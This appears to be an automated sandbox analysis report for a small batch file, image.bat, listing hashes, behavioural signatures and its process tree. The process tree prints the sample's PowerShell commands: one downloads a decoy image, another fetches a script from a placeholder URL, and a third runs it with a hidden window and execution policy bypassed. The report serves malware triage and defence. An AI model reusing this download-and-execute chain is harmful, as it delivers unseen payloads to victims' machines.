Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12/10/2023, 14:02
Static task
static1
Behavioral task
behavioral1
Sample
image.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
image.bat
Resource
win10v2004-20230915-en
General
-
Target
image.bat
-
Size
395B
-
MD5
13859b6b861d616f2a3e4923732af595
-
SHA1
971abd40868e15a2ac78f231f6aeed1b28e65879
-
SHA256
8ca4fcbfc7ae6566a02358e2eb31b25ca5834a23fd2fc96fa1d0952ec5c88edb
-
SHA512
b8a751bfa5d974efd1adb8ee358dca556d0103e2ca8df9a31bdc3ded0e84c42b932caad49bc90ad11107d08f81ea6b63bb3920f50d37f835c93cf6f3cab17213
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2060 powershell.exe 936 powershell.exe 2516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2060 3028 cmd.exe 29 PID 3028 wrote to memory of 2060 3028 cmd.exe 29 PID 3028 wrote to memory of 2060 3028 cmd.exe 29 PID 3028 wrote to memory of 936 3028 cmd.exe 30 PID 3028 wrote to memory of 936 3028 cmd.exe 30 PID 3028 wrote to memory of 936 3028 cmd.exe 30 PID 3028 wrote to memory of 2516 3028 cmd.exe 32 PID 3028 wrote to memory of 2516 3028 cmd.exe 32 PID 3028 wrote to memory of 2516 3028 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\image.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest "https://static.onecms.io/wp-content/uploads/sites/24/2021/04/26/GettyImages-185743593-2000.jpg" -Outfile "doggy.jpg"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri site hosting your powershell script -OutFile .\power.ps1;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -windowstyle hidden -NoProfile -ExecutionPolicy Bypass -file "power.ps1"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58927761b5240501437be70644c1bf8f8
SHA1387004f2c4d8d2e4cdb12479d6c0f3be626ff629
SHA2566415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8
SHA512d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58927761b5240501437be70644c1bf8f8
SHA1387004f2c4d8d2e4cdb12479d6c0f3be626ff629
SHA2566415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8
SHA512d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DKARHD4F6MZKXPDHM0EI.temp
Filesize7KB
MD58927761b5240501437be70644c1bf8f8
SHA1387004f2c4d8d2e4cdb12479d6c0f3be626ff629
SHA2566415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8
SHA512d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039